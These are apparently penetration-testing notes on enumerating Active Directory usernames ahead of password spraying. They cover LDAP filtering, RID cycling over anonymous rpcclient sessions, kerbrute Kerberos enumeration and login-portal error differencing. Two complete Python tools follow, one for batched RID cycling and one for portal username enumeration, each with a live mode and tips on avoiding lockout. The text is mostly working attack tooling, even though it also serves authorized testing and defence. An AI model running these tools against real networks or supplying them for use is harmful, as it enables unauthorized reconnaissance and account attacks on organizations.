Username Enumeration
- Authenticated: read users from LDAP (sAMAccountName / userPrincipalName); drop disabled accounts (userAccountControl has the ACCOUNTDISABLE bit 0x2 set) and stale ones (old lastLogonTimestamp / pwdLastSet) so the list only holds accounts worth spraying.
- Unauthenticated:
  - RID cycling over a SAMR/LSA null session (only if the DC permits anonymous SID/name translation; the "Network access: Allow anonymous SID/Name translation" policy governs this):
    rpcclient -U '' -N <host> -c 'lsaquery'   # prints the domain SID
    for r in $(seq 500 55000); do rpcclient -U '' -N <host> -c "lookupsids <domain-sid>-$r"; done
    lookupsids takes individual SIDs (several per call are fine), not a RID range, so iterate the RIDs; resolved accounts print as DOMAIN\name (1) for users, (2) for groups, and unused RIDs as *unknown* (8).
  - Brute force (one request per candidate, no real password guessing):
    - Kerberos user-enum (AS-REQ without pre-auth: the KDC answers KDC_ERR_C_PRINCIPAL_UNKNOWN for unknown names and KDC_ERR_PREAUTH_REQUIRED for real ones, so no failed logon is recorded and badPwdCount is untouched, but each request can log event 4768 on the DC):
      kerbrute userenum -d <domain> --dc <dc-ip> <userlist>
    - Single-attempt portal error-diff (OWA/ADFS/RDWeb/etc.):
      - Check the lockout policy first (threshold and observation window); one attempt per candidate still increments badPwdCount by one.
      - Submit one login per candidate with a known-bad password.
      - Compare responses for "user not found" vs "wrong password": error text, HTTP status/redirect target, content length, or timing (timing needs several samples and coarse buckets to beat jitter).
      - If responses are generic, or an attempt triggers lockout or an MFA prompt, stop and skip this method.
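Worked example for the RID-cycling step above, added to these notes (it is not a tool the notes reference). It wraps Samba's rpcclient in a null session, batches many SIDs into each lookupsids call to cut round trips, and parses the output into user names. The host argument, the batch size and the sample lookupsids output used for the offline run are assumptions; the sample is constructed, not captured from a real domain.

```python
"""RID cycling over an anonymous LSA/SAMR session with rpcclient.

Added example for these notes, not a tool the notes reference. It assumes
Samba's rpcclient is on PATH and that the target allows anonymous SID/name
translation; SAMPLE_LOOKUPSIDS below is constructed so the parser can be
exercised offline.
"""
import re
import subprocess

# One line per resolved SID: "<sid> DOMAIN\name (<type>)". Type 1 = user,
# 2 = domain group, 4 = local group/alias, 5 = well-known group, 8 = unknown.
LOOKUP_RE = re.compile(
    r"^(?P<sid>S-1-5-21-\d+-\d+-\d+)-(?P<rid>\d+)\s+(?P<name>.+?)\s+\((?P<type>\d+)\)$"
)
SID_TYPE_USER = 1


def rpcclient(host, command):
    """Run one rpcclient command over a null session and return its stdout."""
    proc = subprocess.run(
        ["rpcclient", "-U", "", "-N", host, "-c", command],
        capture_output=True, text=True, check=True,
    )
    return proc.stdout


def parse_domain_sid(lsaquery_output):
    """Pull the domain SID out of 'lsaquery' output ('Domain Sid: S-1-5-21-...')."""
    m = re.search(r"Domain Sid:\s*(S-1-5-21-\d+-\d+-\d+)", lsaquery_output)
    if not m:
        raise ValueError("no domain SID in lsaquery output")
    return m.group(1)


def rid_batches(domain_sid, start=500, stop=55000, size=50):
    """Yield space-separated SID lists; lookupsids accepts many SIDs per call,
    so batching divides the number of RPC round trips by `size`."""
    rids = range(start, stop + 1)
    for i in range(0, len(rids), size):
        yield " ".join(f"{domain_sid}-{r}" for r in rids[i:i + size])


def parse_lookupsids(output):
    """Return [(rid, 'DOMAIN\\name', sid_type)] for resolved SIDs.
    Unused RIDs come back as '*unknown*\\*unknown* (8)' and are dropped."""
    found = []
    for line in output.splitlines():
        m = LOOKUP_RE.match(line.strip())
        if m and not m.group("name").startswith("*unknown*"):
            found.append((int(m.group("rid")), m.group("name"), int(m.group("type"))))
    return found


def user_names(entries):
    """Account names (domain prefix stripped) for entries of type user, sorted."""
    return sorted(name.split("\\", 1)[-1] for _rid, name, t in entries if t == SID_TYPE_USER)


def cycle_rids(host, start=500, stop=55000, size=50):
    """Full run against a live host: fetch the domain SID, then batched lookups."""
    domain_sid = parse_domain_sid(rpcclient(host, "lsaquery"))
    entries = []
    for batch in rid_batches(domain_sid, start, stop, size):
        entries.extend(parse_lookupsids(rpcclient(host, f"lookupsids {batch}")))
    return entries


# Constructed sample of lookupsids output (not captured from a real host).
SAMPLE_LOOKUPSIDS = """\
S-1-5-21-1004336348-1177238915-682003330-500 CORP\\Administrator (1)
S-1-5-21-1004336348-1177238915-682003330-501 CORP\\Guest (1)
S-1-5-21-1004336348-1177238915-682003330-502 CORP\\krbtgt (1)
S-1-5-21-1004336348-1177238915-682003330-503 *unknown*\\*unknown* (8)
S-1-5-21-1004336348-1177238915-682003330-512 CORP\\Domain Admins (2)
S-1-5-21-1004336348-1177238915-682003330-1104 CORP\\jsmith (1)
"""

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        # Live run: python rid_cycle.py <host>
        print("\n".join(user_names(cycle_rids(sys.argv[1]))))
    else:
        # Offline demo on the constructed sample.
        print("\n".join(user_names(parse_lookupsids(SAMPLE_LOOKUPSIDS))))
```

Run it with a host argument for a live session, or without one to see the parser work on the constructed sample. Keep the batch size moderate: very long command strings are fine for rpcclient, but one refused batch (for example when the session is cut) loses the whole batch, and check=True will surface that as an exception rather than silently returning an empty list.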
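Worked example for the single-attempt portal error-diff procedure above, added to these notes (not code from them). It sends exactly one bad-password login per candidate plus one for a canary name that cannot exist, fingerprints each response on status, redirect target, body length and coarse timing, and reports the candidates whose fingerprint differs from the canary's. The transport is injected so the logic runs offline against the constructed fake_portal and generic_portal stand-ins below; against a real target, send_login would wrap an HTTP POST to whatever form the portal exposes. The canary name, the known-bad password and the fake response bodies are all assumptions.

```python
"""Single-attempt response differencing against a login portal.

Added example for these notes, not code from them. The portal transport is
injected so the logic runs offline against the constructed fake_portal and
generic_portal below; a real send_login would POST to the target's form.
"""
import secrets
import time
from dataclasses import dataclass

# A password that cannot be right for anyone, so each candidate costs at most
# one badPwdCount increment. Assumed value; keep it out of any wordlist.
KNOWN_BAD_PASSWORD = "not-a-real-password-" + secrets.token_hex(4)


@dataclass(frozen=True)
class Probe:
    user: str
    status: int        # HTTP status code
    location: str      # redirect target ("" when none)
    length: int        # response body length in bytes
    elapsed_ms: float  # wall-clock time of the request


def fingerprint(p, timing_bucket_ms=250):
    """Features that tend to differ between 'no such user' and 'wrong password'.
    Timing is bucketed coarsely so ordinary jitter does not split the baseline."""
    return (p.status, p.location, p.length, int(p.elapsed_ms // timing_bucket_ms))


def probe(send_login, user):
    """One login attempt; send_login returns (status, location, body_bytes)."""
    t0 = time.perf_counter()
    status, location, body = send_login(user, KNOWN_BAD_PASSWORD)
    elapsed_ms = (time.perf_counter() - t0) * 1000
    return Probe(user, status, location, len(body), elapsed_ms)


def enumerate_users(send_login, candidates, canary=None):
    """One attempt per candidate, compared against a canary user that certainly
    does not exist. Returns the candidates whose response differs from the
    canary's. An empty list means either none are valid or the portal answers
    generically; either way this method has nothing more to give."""
    canary = canary or "nx-" + secrets.token_hex(6)   # assumed nonexistent name
    baseline = fingerprint(probe(send_login, canary))
    return sorted(
        u for u in candidates if fingerprint(probe(send_login, u)) != baseline
    )


def fake_portal(valid_users=("jsmith", "svc_backup")):
    """Constructed stand-in for a leaky portal: same status for both outcomes,
    but the error wording (and so the body length) differs."""
    valid = {u.lower() for u in valid_users}

    def send_login(user, password):
        if user.lower() in valid:
            return 200, "", b"<html><body>The password is incorrect.</body></html>"
        return 200, "", b"<html><body>The user name or password is incorrect.</body></html>"

    return send_login


def generic_portal(user, password):
    """Constructed stand-in for a portal that gives nothing away."""
    return 200, "", b"<html><body>Sign-in failed.</body></html>"


if __name__ == "__main__":
    candidates = ["alice", "jsmith", "bob", "SVC_BACKUP"]
    print("leaky  :", enumerate_users(fake_portal(), candidates))
    print("generic:", enumerate_users(generic_portal, candidates))
```

Against a live portal, probe the canary a few times first: if its fingerprints disagree with each other, widen the timing bucket or drop timing from the fingerprint before trusting any differences between candidates. The one-attempt budget only protects against lockout when the threshold is above one and you stay inside the observation window, which is why the policy check comes before the first request.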